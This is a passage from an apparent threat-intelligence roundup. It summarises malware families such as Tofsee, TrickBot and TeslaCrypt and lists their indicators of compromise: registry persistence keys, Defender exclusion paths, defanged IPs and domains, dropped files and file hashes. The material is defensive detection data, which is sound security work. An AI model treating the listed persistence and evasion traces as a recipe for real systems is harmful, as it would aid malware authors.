sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits. \nWin.Packed.ZeroAccess-7489468-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \nWin.Ransomware.TeslaCrypt-7501245-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily. \nWin.Dropper.Upatre-7491797-0 | Dropper | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware. \nWin.Dropper.TrickBot-7490964-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Packed.Formbook-7491272-1 | Packed | Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard. \n \n| | \n \n* * *\n\n## Threat Breakdown\n\n### Win.Trojan.Razy-7505643-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\SETTINGS\\LEAKDIAGNOSISATTEMPTED ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0748AF3992DE6E3AA7B386B7F6C08EF2.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\1C3DDA8020173A5B45A7C80CFC8B0298.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0748AF3992DE6E3AA7B386B7F6C08EF2.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\B4F3AEA9F95879ABBE9B311B5AB9FC30.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\2AA87EE2B7BAA7D413CC747537A867A2.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\1C3DDA8020173A5B45A7C80CFC8B0298.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\EB9064AF85850CF7B3485B2A911798D7.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\B4F3AEA9F95879ABBE9B311B5AB9FC30.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\2AA87EE2B7BAA7D413CC747537A867A2.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\EB9064AF85850CF7B3485B2A911798D7.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: goodsStartup key ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\6035E0F59A5169E7C59129A3CDBD076E.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\6035E0F59A5169E7C59129A3CDBD076E.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: goods ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0786B90DA12B29B5CC97621DCC78FA3E.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0786B90DA12B29B5CC97621DCC78FA3E.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: mrke ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\14c64321-2d62-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]12[.]206` | 10 \n`172[.]217[.]9[.]225` | 7 \n`172[.]217[.]5[.]238` | 6 \n`104[.]16[.]155[.]36` | 3 \n`77[.]88[.]21[.]158` | 3 \n`172[.]217[.]10[.]46` | 1 \n`172[.]217[.]10[.]33` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]yandex[.]com` | 3 \n`whatismyipaddress[.]com` | 3 \n`doc-00-6c-docs[.]googleusercontent[.]com` | 1 \n`doc-0s-9s-docs[.]googleusercontent[.]com` | 1 \n`doc-14-60-docs[.]googleusercontent[.]com` | 1 \n`doc-0k-c8-docs[.]googleusercontent[.]com` | 1 \n`doc-00-5o-docs[.]googleusercontent[.]com` | 1 \n`doc-10-6c-docs[.]googleusercontent[.]com` | 1 \n`doc-04-bg-docs[.]googleusercontent[.]com` | 1 \n`doc-04-6c-docs[.]googleusercontent[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\pid.txt` | 3 \n`%APPDATA%\\pidloc.txt` | 3 \n`%TEMP%\\holdermail.txt` | 3 \n`%TEMP%\\holderwb.txt` | 3 \n`%HOMEPATH%\\desktop\\product.pif` | 2 \n`%TEMP%\\bhv61AB.tmp` | 1 \n`%TEMP%\\bhv8DF6.tmp` | 1 \n`%HOMEPATH%\\Orkende` | 1 \n`%HOMEPATH%\\Orkende\\Recomm.pif` | 1 \n`%TEMP%\\bhv5953.tmp` | 1 \n \n#### File Hashes\n\n` 3031363a67eca33c68892ed7529803bbaa926a6f371204eeaa8ca205501d8cac 34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93 51e97032af43de44947d564ee43a9b43278312873caaa4bbd7d3e4f7ec00eb89 58962a9133651591f2d4df22589d1cdd4f7cee175f70c7d47c5a854a5264ec98 5be87b343f2d3af80883ed4deb795c0ae8f7e0ae4ba08a6bbac5b3e4659d0341 6bd1baae5ba600ff4ece4523e53bf9818bcc381a56664e3104c1c317d6f5a3bc 6dfdb201ddd46c8f2ded273f3c8ed6c5beca63196b5428fe388f59faaac79597 731aa2659852eb9b98d573b3f59436b49c15492d8df94e18da5a8f4c41f48fbe 79acdd5ea559b2e7e29fa6b47ca1053e11dbaadf540fc2b140aca89d1539d17e 8fa302841d886e0198c96d76d93399f5905844f424b255e6707a74ea610c55ce cdaef1b003e82f8994dd616103781125fca98ec097ee79830c2262f41158237a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-MHJh8tA_x9o/XhjbFSHPYiI/AAAAAAAADFU/6vgp_DT_TBw5sncscgE1kUlKvtjc_gI0ACLcBGAsYHQ/s1600/34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-YOqwN9OAMNc/XhjbJu1E0bI/AAAAAAAADFY/oGYUIcxuUSIoBIPFIKTTnZ_0Nz4zHEWAwCLcBGAsYHQ/s1600/34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7492214-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 192 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 175 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 158 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 68 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: Type ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: ErrorControl ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: DisplayName ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: WOW64 ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: ObjectName ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WPDJIQWL \nValue Name: Description ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: Type ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: ErrorControl ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: DisplayName ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LESYXFLA \nValue Name: WOW64 ` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]55[.]5[.]250` | 192 \n`43[.]231[.]4[.]6/31` | 192 \n`85[.]114[.]134[.]88` | 192 \n`239[.]255[.]255[.]250` | 175 \n`46[.]4[.]52[.]109` | 175 \n`46[.]28[.]66[.]2` | 175 \n`78[.]31[.]67[.]23` | 175 \n`188[.]165[.]238[.]150` | 175 \n`93[.]179[.]69[.]109` | 175 \n`176[.]9[.]114[.]177` | 175 \n`192[.]0[.]47[.]59` | 174 \n`172[.]217[.]12[.]164` | 159 \n`74[.]125[.]192[.]26/31` | 140 \n`67[.]195[.]204[.]72/30` | 135 \n`168[.]95[.]5[.]116/31` | 134 \n`172[.]217[.]197[.]26/31` | 122 \n`172[.]217[.]10[.]67` | 116 \n`216[.]146[.]35[.]35` | 110 \n`212[.]227[.]15[.]40/31` | 104 \n`104[.]47[.]54[.]36` | 102 \n`208[.]76[.]51[.]51` | 101 \n`168[.]95[.]6[.]60/30` | 97 \n`98[.]136[.]96[.]92/31` | 95 \n`31[.]13[.]66[.]174` | 93 \n`98[.]136[.]96[.]74/31` | 91 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 192 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 192 \n`schema[.]org` | 175 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 175 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 175 \n`mta5[.]am0[.]yahoodns[.]net` | 175 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 175 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 175 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 175 \n`whois[.]iana[.]org` | 174 \n`whois[.]arin[.]net` | 173 \n`coolsex-finders6[.]com` | 173 \n`bestladies[.]cn` | 173 \n`bestdates[.]cn` | 173 \n`bestgirlsdates[.]cn` | 173 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 171 \n`eur[.]olc[.]protection[.]outlook[.]com` | 127 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 125 \n`ipinfo[.]io` | 118 \n`nam[.]olc[.]protection[.]outlook[.]com` | 93 \n`mx6[.]earthlink[.]net` | 91 \n`pkvw-mx[.]msg[.]pkvw[.]co[.]charter[.]net` | 88 \n`charter[.]net` | 87 \n`mx0[.]charter[.]net` | 87 \n`msn-com[.]olc[.]protection[.]outlook[.]com` | 72 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 192 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 192 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 188 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 158 \n`%HOMEPATH%` | 59 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 59 \n`%SystemRoot%\\SysWOW64\\wpdjiqwl` | 11 \n`%SystemRoot%\\SysWOW64\\lesyxfla` | 11 \n`%SystemRoot%\\SysWOW64\\mftzygmb` | 10 \n`%SystemRoot%\\SysWOW64\\piwcbjpe` | 10 \n`%SystemRoot%\\SysWOW64\\zsgmltzo` | 10 \n`%SystemRoot%\\SysWOW64\\yrflksyn` | 10 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 9 \n \n#### File Hashes\n\n` 03dfa2a7b5722d6fa2f2f85287c8bea67b2ae1c8be2d9de90b33c2b4dd3c0f42 07314be6c87366f215030d7a2af42440f8a2a187e782ad975a476a84aa389fe1 0862506904a93aba08781be3d9b5189c8cc01bc5fd86d9a4881bd114449502b7 088fe0b34e1db5b9010adb26a2380aa6faf53165f9e2d7d986fd0bc6be614f9e 0ad21f45614d3112c1201ff8a5b3fe702b4943e39ab9d8bc4f38362565c373d5 0b2c1eebcd3f136c556a8568541d589f691dbe6fb450fa708e9774f4ca72fb67 10d2a79f8c199a6ce16b0e3fd4a911524cc2ece755daf67c04f0d3118dfb3498 11e2d71f1dab632b58c9ab60a48c51854d59df47456a97ff9ef59c72b607229c 136e082449131aae0a3e28c21c99aaef24a9d1709cae71daee0e154bf2b45d9f 144d2f639c9dafd40f48b72980609cb018ca83a360b7e24fede6023e0e742397 16f778581e678fdd5e21442d3d55bcc4415271ac94ed0d31c2efd40c772f26ec 1733e36d0e55b369c97e387fa74da22462fbf1858b09befb5de125d9523e3d41 1756a1f4ce0593f80b857ed9a654c656dac96d3405a566dc38737e0a79bc194d 188389b2163b98dbb96edf4000496dacc062f2a6ae2dd021a3f49742d36a2e0b 189f32c3d78e9b129d62bb4e40b3693da216cc371018d5ce4ef2356a94ca4f6e 18f25a4e071f993b9ceac935a3814d7667e42c46d22ea9e8ccd7c4a3f0087f7b 1a747af4f485eb3c8c475c9dcd9cac9d7fe279f3f45777d793572c4927e07ffa 1af4c3359d224c2ad2006db3c9786afdeeb90404ab91ec7c63467092264e2183 1c1d1c939fd6d3e6a77c2fa342f2c39433eea8f9d3c749ecee42e287734bd330 1c69825459d03fb13956e1a0f40e485731fbe96e48efe1abc765db537fec77ba 1d3aecb8b67bd70634fbffcf15b5e21ef0ee95627d296e78caf3f07842820d9a 1d9d2d4000df6baadc93db56dbdc783c9db35a047be86bed8d4bfaacb33b6a9c 1f42ceba5e533e7aeb5395e1db11ef780b02e44c8cde237394b663b816da69b4 1ff0ce00b3cc5e3223e31501e16302b44ae24981b4b61f3500bdba2f671a057f 20f52e7aa1ee2e27dffcb75eb1e207681dbe2f72d44b0f4d2f66498102d8cf8e `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security | !